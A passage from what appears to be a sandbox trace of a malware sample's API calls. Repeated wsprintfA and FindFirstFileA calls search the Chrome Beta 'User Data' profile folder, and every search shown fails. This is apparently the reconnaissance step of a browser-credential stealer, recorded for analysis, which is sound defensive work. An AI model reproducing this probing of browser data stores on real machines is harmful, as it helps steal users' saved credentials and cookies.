Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.504] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.504] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.504] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.504] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.505] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.505] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.505] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.505] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.505] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.505] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.506] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.506] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.506] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.506] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.506] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.506] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.506] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.506] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.506] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.506] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.507] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.507] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.507] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.507] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.507] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.507] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.507] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.507] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.508] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.508] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.508] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.508] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.508] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.508] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.508] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.508] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.508] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.508] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.509] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.509] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.509] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.509] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.509] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.509] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.509] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.509] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.509] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.509] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.510] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.510] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.510] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.510] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.510] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.510] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.510] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.510] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.510] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.510] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.511] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.511] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.511] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.511] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.511] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.511] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.511] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.511] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, 